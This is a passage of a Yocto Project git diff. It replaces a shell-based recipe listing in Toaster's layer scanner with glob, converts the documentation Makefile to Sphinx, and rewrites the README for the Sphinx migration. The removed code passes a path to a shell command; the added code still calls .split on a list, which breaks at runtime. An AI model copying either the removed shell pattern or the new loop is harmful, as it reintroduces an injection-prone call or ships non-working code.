@@ -11,7 +11,7 @@ import os
 import re
 import logging
 import json
-import subprocess
+import glob
 from collections import Counter
 
 from orm.models import Project, ProjectTarget, Build, Layer_Version
@@ -227,20 +227,18 @@ class XhrSetDefaultImageUrl(View):
 #    same logical name
 #  * Each project that uses a layer will have its own
 #    LayerVersion and Project Layer for it
-#  * During the Paroject delete process, when the last
+#  * During the Project delete process, when the last
 #    LayerVersion for a 'local_source_dir' layer is deleted
 #    then the Layer record is deleted to remove orphans
 #
 
 def scan_layer_content(layer,layer_version):
     # if this is a local layer directory, we can immediately scan its content
-    if layer.local_source_dir:
+    if os.path.isdir(layer.local_source_dir):
         try:
             # recipes-*/*/*.bb
-            cmd = '%s %s' % ('ls', os.path.join(layer.local_source_dir,'recipes-*/*/*.bb'))
-            recipes_list = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read()
-            recipes_list = recipes_list.decode("utf-8").strip()
-            if recipes_list and 'No such' not in recipes_list:
+            recipes_list = glob.glob(os.path.join(layer.local_source_dir, 'recipes-*/*/*.bb'))
+            for recipe in recipes_list:
                 for recipe in recipes_list.split('\n'):
                     recipe_path = recipe[recipe.rfind('recipes-'):]
                     recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','')
@@ -260,6 +258,9 @@ def scan_layer_content(layer,layer_version):
 
         except Exception as e:
             logger.warning("ERROR:scan_layer_content: %s" % e)
+    else:
+        logger.warning("ERROR: wrong path given")
+        raise KeyError("local_source_dir")
 
 class XhrLayer(View):
     """ Delete, Get, Add and Update Layer information
@@ -456,15 +457,18 @@ class XhrLayer(View):
                              'layerdetailurl':
                              layer_dep.get_detailspage_url(project.pk)})
 
-            # Scan the layer's content and update components
-            scan_layer_content(layer,layer_version)
+            # Only scan_layer_content if layer is local
+            if layer_data.get('local_source_dir', None):
+                # Scan the layer's content and update components
+                scan_layer_content(layer,layer_version)
 
         except Layer_Version.DoesNotExist:
             return error_response("layer-dep-not-found")
         except Project.DoesNotExist:
             return error_response("project-not-found")
-        except KeyError:
-            return error_response("incorrect-parameters")
+        except KeyError as e:
+            _log("KeyError: %s" % e)
+            return error_response(f"incorrect-parameters")
 
         return JsonResponse({'error': "ok",
                              'imported_layer': {
diff --git a/documentation/.gitignore b/documentation/.gitignore
new file mode 100644
index 0000000000..21bb72530a
--- /dev/null
+++ b/documentation/.gitignore
@@ -0,0 +1,2 @@
+_build/
+Pipfile.lock
diff --git a/documentation/Makefile b/documentation/Makefile
index 15644bf926..d40f390e2b 100644
--- a/documentation/Makefile
+++ b/documentation/Makefile
@@ -1,431 +1,35 @@
-# This is a single Makefile to handle all generated Yocto Project documents,
-# which includes the BitBake User Manual and the Toaster User Manual.
-# The Makefile needs to live in the documents directory and all figures used
-# in any manuals must be .PNG files and live in the individual book's figures
-# directory as well as in the figures directory for the mega-manual.
+# Minimal makefile for Sphinx documentation
 #
-# Note that the figures for the Yocto Project Development Tasks Manual
-# differ depending on the BRANCH being built.
-#
-# The Makefile has these targets:
-#    all:       If you leave off the target then "all" is implied.
-#               You will generate HTML and a tarball of files.
-#
-#    pdf:	generates a PDF version of a manual.  Not valid for the
-#		Quick Start or the mega-manual (single, large HTML file
-#		comprised of all Yocto Project manuals).
-#    html:	generates an HTML version of a manual.
-#    tarball:	creates a tarball for the doc files.
-#    validate:	validates
-#    publish:	pushes generated files to the Yocto Project website
-#    clean:	removes files
-#
-# The Makefile can generate an HTML and PDF version of every document except the
-# Yocto Project Quick Start and the single, HTML mega-manual, which is comprised
-# of all the individual Yocto Project manuals.  You can generate these two manuals
-# in HTML form only.  The variable DOC indicates the folder name for a given manual.
-# The variable VER represents the distro version of the Yocto Release for which the
-# manuals are being generated.  The variable BRANCH is used to indicate the
-# branch (edison or denzil) and is used only when DOC=dev-manual or
-# DOC=mega-manual.  If you do not specify a BRANCH, the default branch used
-# will be for the latest Yocto Project release.  If you build for either
-# edison or denzil, you must use BRANCH. You do not need to use BRANCH for
-# any release beyond denzil.
-#
-# To build a manual, you must invoke Makefile with the DOC argument.  If you
-# are going to publish the manual, then you must invoke Makefile with both the
-# DOC and the VER argument.  Furthermore, if you are building or publishing
-# the edison or denzil versions of the Yocto Project Development Tasks Manual or
-# the mega-manual, you must also use the BRANCH argument.
-#
-# Examples:
-#
-#     make DOC=bsp-guide
-#     make html DOC=brief-yoctoprojectqs
-#     make pdf DOC=ref-manual
-#     make DOC=dev-manual BRANCH=edison
-#     make DOC=mega-manual BRANCH=denzil
-#
-# The first example generates the HTML version of the BSP Guide.
-# The second example generates the HTML version only of the Quick Start.  Note
-# that the Quick Start only has an HTML version available.  So, the
-# 'make DOC=brief-yoctoprojectqs' command would be equivalent. The third example
-# generates just the PDF version of the Yocto Project Reference Manual.
-# The fourth example generates the HTML 'edison' version of the YP Development
-# Tasks Manual.  The last example
-# generates the HTML version of the mega-manual and uses the 'denzil'
-# branch when choosing figures for the tarball of figures.  Any example that does
-# not use the BRANCH argument builds the current version of the manual set.
-#
-# The publish target pushes the generated manuals to the Yocto Project
-# website.  Unless you are a developer on the YP team, you will not succeed in
-# pushing manuals to this server.  All files needed for the manual's HTML form are
-# pushed.
-#
-# Examples:
-#
-#    make publish DOC=bsp-guide VER=1.7
-#    make publish DOC=adt-manual VER=1.6
-#    make publish DOC=dev-manual VER=1.1.1 BRANCH=edison
-#    make publish DOC=dev-manual VER=1.2 BRANCH=denzil
-#
-# The first example publishes the 1.7 version of both the PDF and HTML versions of
-# the BSP Guide.  The second example publishes the 1.6 version of both the PDF and
-# HTML versions of the ADT Manual. The third example publishes the 1.1.1 version of
-# the PDF and HTML YP Development Tasks Manual for the 'edison' branch.  The fourth
-# example publishes the 1.2 version of the PDF and HTML YP Development Tasks Manual
-# for the 'denzil' branch.
-#
-# IN MEMORIAM: This comment is to remember Scott Rifenbark (scottrif), whom we lost
-# in January, 2020. Scott was the primary technical writer for the Yocto Project for
-# over 9 years. In that time, he contributed many thousands of patches, built this
-# documentation tree, and enabled tens of thousands of developers to succeed with
-# embedded Linux. He ran this Makefile many thousands of times. Godspeed, Dude.
 
-ifeq ($(DOC),brief-yoctoprojectqs)
-XSLTOPTS = --stringparam html.stylesheet brief-yoctoprojectqs-style.css \
-           --stringparam  chapter.autolabel 0 \
-           --stringparam  section.autolabel 0 \
-           --stringparam  section.label.includes.component.label 0 \
-           --xinclude
-ALLPREQ = html tarball
-TARFILES = brief-yoctoprojectqs-style.css brief-yoctoprojectqs.html figures/bypqs-title.png \
-           figures/yocto-project-transp.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
+# You can set these variables from the command line, and also
+# from the environment for the first two.
+SPHINXOPTS    ?= -j auto
+SPHINXBUILD   ?= sphinx-build
+SOURCEDIR     = .
+BUILDDIR      = _build
+DESTDIR       = final
 
+ifeq ($(shell if which $(SPHINXBUILD) >/dev/null 2>&1; then echo 1; else echo 0; fi),0)
+$(error "The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed")
 endif
 
-ifeq ($(DOC),overview-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = overview-manual-style.css overview-manual.html figures/overview-manual-title.png \
-           figures/git-workflow.png figures/source-repos.png figures/index-downloads.png \
-           figures/yp-download.png figures/YP-flow-diagram.png figures/key-dev-elements.png \
-           figures/poky-reference-distribution.png figures/cross-development-toolchains.png \
-           figures/user-configuration.png figures/layer-input.png figures/source-input.png \
-           figures/package-feeds.png figures/patching.png figures/source-fetching.png \
-           figures/configuration-compile-autoreconf.png figures/analysis-for-package-splitting.png \
-           figures/image-generation.png figures/sdk-generation.png figures/images.png \
-           figures/sdk.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-
-endif
+# Put it first so that "make" without argument is like "make help".
+help:
+	@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
 
-ifeq ($(DOC),bsp-guide)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = bsp-style.css bsp-guide.html figures/bsp-title.png \
-           figures/bsp-dev-flow.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
+.PHONY: help Makefile clean publish
 
-endif
-
-ifeq ($(DOC),dev-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-#
-# Note that the tarfile might produce the "Cannot stat: No such file or
-# directory" error message for .PNG files that are not present when building
-# a particular branch.  The list of files is all-inclusive for all branches.
-# Note, if you don't provide a BRANCH option, it defaults to the latest stuff.
-# This would be appropriate for "master" branch.
-#
-
-	ifeq ($(BRANCH),edison)
-TARFILES = dev-style.css dev-manual.html \
-           figures/app-dev-flow.png figures/bsp-dev-flow.png \
-           figures/dev-title.png figures/git-workflow.png \
-           figures/index-downloads.png figures/kernel-dev-flow.png \
-           figures/kernel-example-repos-edison.png \
-           figures/kernel-overview-1.png figures/kernel-overview-2.png \
-           figures/kernel-overview-3-edison.png \
-           figures/source-repos.png figures/yp-download.png \
-           figures/wip.png
-	else ifeq ($(BRANCH),denzil)
-TARFILES = dev-style.css dev-manual.html \
-           figures/app-dev-flow.png figures/bsp-dev-flow.png \
-           figures/dev-title.png figures/git-workflow.png \
-           figures/index-downloads.png figures/kernel-dev-flow.png \
-           figures/kernel-example-repos-denzil.png \
-           figures/kernel-overview-1.png figures/kernel-overview-2.png \
-           figures/kernel-overview-3-denzil.png \
-           figures/source-repos.png figures/yp-download.png \
-           figures/wip.png
-        else
-TARFILES = dev-style.css dev-manual.html figures/buildhistory-web.png \
-           figures/dev-title.png figures/buildhistory.png \
-           figures/recipe-workflow.png figures/bitbake-build-flow.png \
-           figures/multiconfig_files.png figures/cute-files-npm-example.png
-	endif
-
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-
-endif
-
-ifeq ($(DOC),mega-manual)
-XSLTOPTS = --stringparam html.stylesheet mega-style.css \
-           --stringparam  chapter.autolabel 1 \
-           --stringparam  section.autolabel 1 \
-           --stringparam  section.label.includes.component.label 1 \
-           --xinclude
-ALLPREQ = html tarball
-
-	ifeq ($(BRANCH),edison)
-TARFILES = mega-manual.html mega-style.css figures/yocto-environment.png \
-        figures/building-an-image.png  \
-	figures/using-a-pre-built-image.png \
-	figures/poky-title.png \
-	figures/adt-title.png figures/bsp-title.png \
-	figures/kernel-title.png figures/kernel-architecture-overview.png \
-	figures/app-dev-flow.png figures/bsp-dev-flow.png \
-        figures/dev-title.png figures/git-workflow.png \
-        figures/index-downloads.png figures/kernel-dev-flow.png \
-	figures/kernel-example-repos-edison.png \
-	figures/kernel-overview-1.png figures/kernel-overview-2.png \
-	figures/kernel-overview-3-edison.png \
-	figures/source-repos.png figures/yp-download.png \
-	figures/wip.png
-	else ifeq ($(BRANCH),denzil)
-TARFILES = mega-manual.html mega-style.css figures/yocto-environment.png \
-        figures/building-an-image.png  \
-	figures/using-a-pre-built-image.png \
-	figures/poky-title.png \
-	figures/adt-title.png figures/bsp-title.png \
-	figures/kernel-title.png figures/kernel-architecture-overview.png \
-	figures/app-dev-flow.png figures/bsp-dev-flow.png \
-        figures/dev-title.png figures/git-workflow.png \
-        figures/index-downloads.png figures/kernel-dev-flow.png \
-	figures/kernel-example-repos-denzil.png \
-	figures/kernel-overview-1.png figures/kernel-overview-2.png \
-	figures/kernel-overview-3-denzil.png \
-	figures/source-repos.png figures/yp-download.png \
-	figures/wip.png
-        else
-TARFILES = mega-manual.html mega-style.css \
-        figures/YP-flow-diagram.png \
-	figures/using-a-pre-built-image.png \
-	figures/poky-title.png figures/buildhistory.png \
-        figures/buildhistory-web.png \
-	figures/sdk-title.png figures/bsp-title.png \
-	figures/kernel-dev-title.png figures/kernel-architecture-overview.png \
-	figures/bsp-dev-flow.png \
-        figures/dev-title.png \
-	figures/git-workflow.png figures/index-downloads.png \
-        figures/kernel-dev-flow.png \
-	figures/kernel-overview-2-generic.png \
-	figures/source-repos.png figures/yp-download.png \
-        figures/profile-title.png figures/kernelshark-all.png \
-        figures/kernelshark-choose-events.png \
-        figures/kernelshark-i915-display.png \
-        figures/kernelshark-output-display.png \
-        figures/oprofileui-busybox.png figures/oprofileui-copy-to-user.png \
-        figures/oprofileui-downloading.png figures/oprofileui-processes.png \
-        figures/perf-probe-do_fork-profile.png \
-        figures/perf-report-cycles-u.png \
-        figures/perf-systemwide.png figures/perf-systemwide-libc.png \
-        figures/perf-wget-busybox-annotate-menu.png \
-        figures/perf-wget-busybox-annotate-udhcpc.png \
-        figures/perf-wget-busybox-debuginfo.png \
-        figures/perf-wget-busybox-dso-zoom.png \
-        figures/perf-wget-busybox-dso-zoom-menu.png \
-        figures/perf-wget-busybox-expanded-stripped.png \
-        figures/perf-wget-flat-stripped.png \
-        figures/perf-wget-g-copy-from-user-expanded-stripped.png \
-        figures/perf-wget-g-copy-to-user-expanded-debuginfo.png \
-        figures/perf-wget-g-copy-to-user-expanded-stripped.png \
-        figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png \
-        figures/pybootchartgui-linux-yocto.png \
-        figures/pychart-linux-yocto-rpm.png \
-        figures/pychart-linux-yocto-rpm-nostrip.png \
-        figures/sched-wakeup-profile.png figures/sysprof-callers.png \
-        figures/sysprof-copy-from-user.png figures/sysprof-copy-to-user.png \
-        figures/cross-development-toolchains.png \
-	figures/user-configuration.png \
-        figures/source-input.png figures/package-feeds.png \
-        figures/layer-input.png figures/images.png figures/sdk.png \
-	figures/source-fetching.png figures/patching.png \
-        figures/configuration-compile-autoreconf.png \
-	figures/analysis-for-package-splitting.png \
-        figures/image-generation.png figures/key-dev-elements.png\
-	figures/sdk-generation.png figures/recipe-workflow.png \
-	figures/build-workspace-directory.png figures/mega-title.png \
-	figures/toaster-title.png figures/hosted-service.png figures/multiconfig_files.png \
-	figures/simple-configuration.png figures/poky-reference-distribution.png \
-	figures/compatible-layers.png figures/import-layer.png figures/new-project.png \
-	figures/sdk-environment.png figures/sdk-installed-standard-sdk-directory.png \
-	figures/sdk-devtool-add-flow.png figures/sdk-installed-extensible-sdk-directory.png \
-	figures/sdk-devtool-modify-flow.png \
-	figures/sdk-devtool-upgrade-flow.png figures/bitbake-build-flow.png figures/bypqs-title.png \
-	figures/overview-manual-title.png figures/sdk-autotools-flow.png figures/sdk-makefile-flow.png \
-	figures/bb_multiconfig_files.png figures/bitbake-title.png figures/cute-files-npm-example.png
-	endif
-
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-
-endif
-
-ifeq ($(DOC),ref-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = ref-manual.html ref-style.css figures/poky-title.png \
-	figures/build-workspace-directory.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),sdk-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = sdk-manual.html sdk-style.css figures/sdk-title.png \
-           figures/sdk-environment.png figures/sdk-installed-standard-sdk-directory.png \
-	   figures/sdk-installed-extensible-sdk-directory.png figures/sdk-devtool-add-flow.png \
-	   figures/sdk-devtool-modify-flow.png \
-	   figures/sdk-devtool-upgrade-flow.png figures/sdk-autotools-flow.png figures/sdk-makefile-flow.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),profile-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = profile-manual.html profile-manual-style.css \
-           figures/profile-title.png figures/kernelshark-all.png \
-           figures/kernelshark-choose-events.png \
-           figures/kernelshark-i915-display.png \
-           figures/kernelshark-output-display.png \
-           figures/oprofileui-busybox.png figures/oprofileui-copy-to-user.png \
-           figures/oprofileui-downloading.png figures/oprofileui-processes.png \
-           figures/perf-probe-do_fork-profile.png \
-           figures/perf-report-cycles-u.png \
-           figures/perf-systemwide.png figures/perf-systemwide-libc.png \
-           figures/perf-wget-busybox-annotate-menu.png \
-           figures/perf-wget-busybox-annotate-udhcpc.png \
-           figures/perf-wget-busybox-debuginfo.png \
-           figures/perf-wget-busybox-dso-zoom.png \
-           figures/perf-wget-busybox-dso-zoom-menu.png \
-           figures/perf-wget-busybox-expanded-stripped.png \
-           figures/perf-wget-flat-stripped.png \
-           figures/perf-wget-g-copy-from-user-expanded-stripped.png \
-           figures/perf-wget-g-copy-to-user-expanded-debuginfo.png \
-           figures/perf-wget-g-copy-to-user-expanded-stripped.png \
-           figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png \
-           figures/pybootchartgui-linux-yocto.png \
-           figures/pychart-linux-yocto-rpm.png \
-           figures/pychart-linux-yocto-rpm-nostrip.png \
-           figures/sched-wakeup-profile.png figures/sysprof-callers.png \
-           figures/sysprof-copy-from-user.png figures/sysprof-copy-to-user.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),kernel-dev)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = kernel-dev.html kernel-dev-style.css \
-           figures/kernel-dev-title.png figures/kernel-overview-2-generic.png \
-           figures/kernel-architecture-overview.png figures/kernel-dev-flow.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),toaster-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = toaster-manual.html toaster-manual-style.css \
-	   figures/toaster-title.png figures/simple-configuration.png \
-	   figures/hosted-service.png \
-	   figures/compatible-layers.png figures/import-layer.png figures/new-project.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your locally installed XSL stylesheets.
-XSL_BASE_URI  = http://docbook.sourceforge.net/release/xsl/1.76.1
-XSL_XHTML_URI = $(XSL_BASE_URI)/xhtml/docbook.xsl
-
-all: $(ALLPREQ)
-
-pdf:
-ifeq ($(DOC),brief-yoctoprojectqs)
-	@echo " "
-	@echo "ERROR: You cannot generate a PDF file for brief-yoctoprojectqs."
-	@echo " "
-
-else ifeq ($(DOC),mega-manual)
-	@echo " "
-	@echo "ERROR: You cannot generate a mega-manual PDF file."
-	@echo " "
-
-else
-
-	cd $(DOC); ../tools/poky-docbook-to-pdf $(DOC).xml ../template; cd ..
-endif
-
-html:
-ifeq ($(DOC),mega-manual)
-#       See http://www.sagehill.net/docbookxsl/HtmlOutput.html
-	@echo " "
-	@echo "******** Building "$(DOC)
-	@echo " "
-	cd $(DOC); xsltproc $(XSLTOPTS) -o $(DOC).html $(DOC)-customization.xsl $(DOC).xml; cd ..
-	@echo " "
-	@echo "******** Using mega-manual.sed to process external links"
-	@echo " "
-	cd $(DOC); sed -f ../tools/mega-manual.sed < mega-manual.html > mega-output.html; cd ..
-	@echo " "
-	@echo "******** Cleaning up transient file mega-output.html"
-	@echo " "
-	cd $(DOC); rm mega-manual.html; mv mega-output.html mega-manual.html; cd ..
-else
-#       See http://www.sagehill.net/docbookxsl/HtmlOutput.html
-	@echo " "
-	@echo "******** Building "$(DOC)
-	@echo " "
-	cd $(DOC); xsltproc $(XSLTOPTS) -o $(DOC).html $(DOC)-customization.xsl $(DOC).xml; cd ..
-endif
-
-
-tarball: html
-	@echo " "
-	@echo "******** Creating Tarball of document files"
-	@echo " "
-	cd $(DOC); tar -cvzf $(DOC).tgz $(TARFILES); cd ..
-
-validate:
-	cd $(DOC); xmllint --postvalid --xinclude --noout $(DOC).xml; cd ..
-
-
-publish:
-	@if test -f $(DOC)/$(DOC).html; \
-	  then \
-            echo " "; \
-            echo "******** Publishing "$(DOC)".html"; \
-            echo " "; \
-            scp -r $(MANUALS) $(STYLESHEET) www.yoctoproject.org:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
-            cd $(DOC); scp -r $(FIGURES) www.yoctoproject.org:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
-	else \
-          echo " "; \
-          echo $(DOC)".html missing.  Generate the file first then try again."; \
-          echo " "; \
-	fi
+publish: Makefile html singlehtml
+	rm -rf $(BUILDDIR)/$(DESTDIR)/
+	mkdir -p $(BUILDDIR)/$(DESTDIR)/
+	cp -r $(BUILDDIR)/html/* $(BUILDDIR)/$(DESTDIR)/
+	cp $(BUILDDIR)/singlehtml/index.html $(BUILDDIR)/$(DESTDIR)/singleindex.html
+	sed -i -e 's@index.html#@singleindex.html#@g' $(BUILDDIR)/$(DESTDIR)/singleindex.html
 
 clean:
-	rm -rf $(MANUALS); rm $(DOC)/$(DOC).tgz;
+	@rm -rf $(BUILDDIR)
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+	@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
diff --git a/documentation/Pipfile b/documentation/Pipfile
new file mode 100644
index 0000000000..7ee1d22905
--- /dev/null
+++ b/documentation/Pipfile
@@ -0,0 +1,14 @@
+[[source]]
+name = "pypi"
+url = "https://pypi.org/simple"
+verify_ssl = true
+
+[dev-packages]
+
+[packages]
+sphinx = "*"
+sphinx-rtd-theme = "*"
+pyyaml = "*"
+
+[requires]
+python_version = "3"
diff --git a/documentation/README b/documentation/README
index d64f2fd2f9..28d5c4be8e 100644
--- a/documentation/README
+++ b/documentation/README
@@ -34,22 +34,17 @@ Manual Organization
 
 Folders exist for individual manuals as follows:
 
-* sdk-manual       - The Yocto Project Software Development Kit (SDK) Developer's Guide.
-* bsp-guide        - The Yocto Project Board Support Package (BSP) Developer's Guide
-* dev-manual       - The Yocto Project Development Tasks Manual
-* kernel-dev       - The Yocto Project Linux Kernel Development Tasks Manual
-* ref-manual       - The Yocto Project Reference Manual
-* yocto-project-qs - The Yocto Project Quick Start
-* mega-manual      - The Yocto Project Mega-Manual, which is an aggregated manual comprised
-                     of all YP manuals and guides
-* profile-manual   - The Yocto Project Profile and Tracing Manual
-* toaster-manual   - The Toaster Manual
-
-Each folder is self-contained regarding content and figures.  Note that there
-is a sed file needed to process the links of the mega-manual.  The sed file
-is located in the tools directory.  Also note that the figures folder in the
-mega-manual directory contains duplicates of all the figures in the YP folders
-directories for all YP manuals and guides.
+* sdk-manual           - The Yocto Project Software Development Kit (SDK) Developer's Guide.
+* bsp-guide            - The Yocto Project Board Support Package (BSP) Developer's Guide
+* dev-manual           - The Yocto Project Development Tasks Manual
+* kernel-dev           - The Yocto Project Linux Kernel Development Tasks Manual
+* ref-manual           - The Yocto Project Reference Manual
+* brief-yoctoprojectqs - The Yocto Project Quick Start
+* profile-manual       - The Yocto Project Profile and Tracing Manual
+* toaster-manual       - The Toaster Manual
+* test-manual          - The Test Environment Manual
+
+Each folder is self-contained regarding content and figures.
 
 If you want to find HTML versions of the Yocto Project manuals on the web,
 go to http://www.yoctoproject.org and click on the "Documentation" tab.  From
@@ -60,34 +55,273 @@ currently being developed.
 In general, the Yocto Project site (http://www.yoctoproject.org) is a great
 reference for both information and downloads.
 
-Makefile
+poky.yaml
+=========
+
+This file defines variables used for documentation production.  The variables
+are used to define release pathnames, URLs for the published manuals, etc.
+
+template
 ========
+Contains various templates, fonts, and some old PNG files.
+
+Sphinx
+======
+
+The Yocto Project documentation was migrated from the original DocBook
+format to Sphinx based documentation for the Yocto Project 3.2
+release. This section will provide additional information related to
+the Sphinx migration, and guidelines for developers willing to
+contribute to the Yocto Project documentation.
+
+   Sphinx is a tool that makes it easy to create intelligent and
+   beautiful documentation, written by Georg Brandl and licensed under
+   the BSD license. It was originally created for the Python
+   documentation.
+
+Extensive documentation is available on the Sphinx website:
+https://www.sphinx-doc.org/en/master/. Sphinx is designed to be
+extensible thanks to the ability to write our own custom extensions,
+as Python modules, which will be executed during the generation of the
+documentation.
+
+Yocto Project documentation website
+===================================
+
+A new website has been created to host the Yocto Project
+documentation, it can be found at: https://docs.yoctoproject.org/.
+
+The entire Yocto Project documentation, as well as the BitBake manual
+is published on this website, including all previously released
+versions. A version switcher was added, as a drop-down menu on the top
+of the page to switch back and forth between the various versions of
+the current active Yocto Project releases.
+
+Transition pages have been added (as rst file) to show links to old
+versions of the Yocto Project documentation with links to each manual
+generated with DocBook.
+
+How to build the Yocto Project documentation
+============================================
+
+Sphinx is written in Python. While it might work with Python2, for
+obvious reasons, we will only support building the Yocto Project
+documentation with Python3.
+
+Sphinx might be available in your Linux distro packages repositories,
+however it is not recommend using distro packages, as they might be
+old versions, especially if you are using an LTS version of your
+distro. The recommended method to install Sphinx and all required
+dependencies is to use the Python Package Index (pip).
 
-The Makefile processes manual directories to create HTML, PDF,
-tarballs, etc.  Details on how the Makefile work are documented
-inside the Makefile.  See that file for more information.
+To install all required packages run:
 
-To build a manual, you run the make command and pass it the name
-of the folder containing the manual's contents.
-For example, the following command run from the documentation directory
-creates an HTML version of the SDK manual.
-The DOC variable specifies the manual you are making:
+ $ pip3 install sphinx sphinx_rtd_theme pyyaml
 
-     $ make DOC=sdk-manual
+To build the documentation locally, run:
 
-poky.ent
+ $ cd documentation
+ $ make html
+
+The resulting HTML index page will be _build/html/index.html, and you
+can browse your own copy of the locally generated documentation with
+your browser.
+
+Alternatively, you can use Pipenv to automatically install all required
+dependencies in a virtual environment:
+
+ $ cd documentation
+ $ pipenv install
+ $ pipenv run make html
+
+Sphinx theme and CSS customization
+==================================
+
+The Yocto Project documentation is currently based on the "Read the
+Docs" Sphinx theme, with a few changes to make sure the look and feel
+of the project documentation is preserved.
+
+Most of the theme changes can be done using the file
+'sphinx-static/theme_overrides.css'. Most CSS changes in this file
+were inherited from the DocBook CSS stylesheets.
+
+Sphinx design guidelines and principles
+=======================================
+
+The initial Docbook to Sphinx migration was done with an automated
+tool called Pandoc (https://pandoc.org/). The tool produced some clean
+output markdown text files. After the initial automated conversion
+additional changes were done to fix up headings, images and links. In
+addition Sphinx has built in mechanisms (directives) which were used
+to replace similar functions implemented in Docbook such as glossary,
+variables substitutions, notes and references.
+
+Headings
 ========
 
-This file defines variables used for documentation production.  The variables
-are used to define release pathnames, URLs for the published manuals, etc.
+The layout of the Yocto Project manuals is organized as follows
 
-template
+    Book
+      Chapter
+        Section
+          Section
+            Section
+
+The following headings styles are defined in Sphinx:
+
+    Book              => overline ===
+      Chapter         => overline ***
+        Section       => ====
+          Section     => ----
+            Section   => ^^^^
+              Section => """" or ~~~~
+
+With this proposal, we preserve the same TOCs between Sphinx and Docbook.
+
+Built-in glossary
+=================
+
+Sphinx has a glossary directive. From
+https://www.sphinx-doc.org/en/master/usage/restructuredtext/directives.html#glossary:
+
+    This directive must contain a reST definition list with terms and
+    definitions. The definitions will then be referencable with the
+    [https://www.sphinx-doc.org/en/master/usage/restructuredtext/roles.html#role-term
+    'term' role].
+
+So anywhere in any of the Yocto Project manuals, :term:`VAR` can be
+used to refer to an item from the glossary, and a link is created
+automatically. A general index of terms is also generated by Sphinx
+automatically.
+
+Global substitutions
+====================
+
+The Yocto Project documentation makes heavy use of global
+variables. In Docbook these variables are stored in the file
+poky.ent. This Docbook feature is not handled automatically with
+Pandoc. Sphinx has builtin support for substitutions
+(https://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html#substitutions),
+however there are important shortcomings. For example they cannot be
+used/nested inside code-block sections.
+
+A Sphinx extension was implemented to support variable substitutions
+to mimic the DocBook based documentation behavior. Variabes
+substitutions are done while reading/parsing the .rst files. The
+pattern for variables substitutions is the same as with DocBook,
+e.g. `&VAR;`.
+
+The implementation of the extension can be found here in the file
+documentation/sphinx/yocto-vars.py, this extension is enabled by
+default when building the Yocto Project documentation.  All variables
+are set in a file call poky.yaml, which was initially generated from
+poky.ent. The file was converted into YAML so that it is easier to
+process by the custom Sphinx extension (which is a Python module).
+
+For example, the following .rst content will produce the 'expected'
+content:
+
+  .. code-block::
+      $ mkdir ~/poky-&DISTRO;
+      or
+      $ git clone &YOCTO_GIT_URL;/git/poky -b &DISTRO_NAME_NO_CAP;
+
+Variables can be nested, like it was the case for DocBook:
+
+  YOCTO_HOME_URL : "http://www.yoctoproject.org"
+  YOCTO_DOCS_URL : "&YOCTO_HOME_URL;/docs"
+
+Note directive
+==============
+
+Sphinx has a builtin 'note' directive that produces clean Note section
+in the output file. There are various types of directives such as
+"attention", "caution", "danger", "error", "hint", "important", "tip",
+"warning", "admonition" that are supported, and additional directive
+can be added as Sphinx extension if needed.
+
+Figures
+=======
+
+The Yocto Project documentation has many figures/images. Sphinx has a
+'figure' directive which is straight forward to use. To include a
+figure in the body of the documentation:
+
+  .. image:: figures/YP-flow-diagram.png
+
+Links and References
+====================
+
+The following types of links can be used: links to other locations in
+the same document, to locations in other documents and to external
+websites.
+
+More information can be found here:
+https://sublime-and-sphinx-guide.readthedocs.io/en/latest/references.html.
+
+References
+==========
+
+The following extension is enabed by default:
+sphinx.ext.autosectionlabel
+(https://www.sphinx-doc.org/en/master/usage/extensions/autosectionlabel.html).
+
+This extension allows you to refer sections by their titles. Note that
+autosectionlabel_prefix_document is enabled by default, so that we can
+insert references from any document.
+
+For example, to insert an HTML link to a section from
+documentaion/manual/intro.rst, use:
+
+  Please check this :ref:`manual/intro:Cross-References to Locations in the Same Document`
+
+Alternatively a custom text can be used instead of using the section
+text:
+
+  Please check this :ref:`section <manual/intro:Cross-References to Locations in the Same Document>`
+
+TIP: The following command can be used to dump all the references that
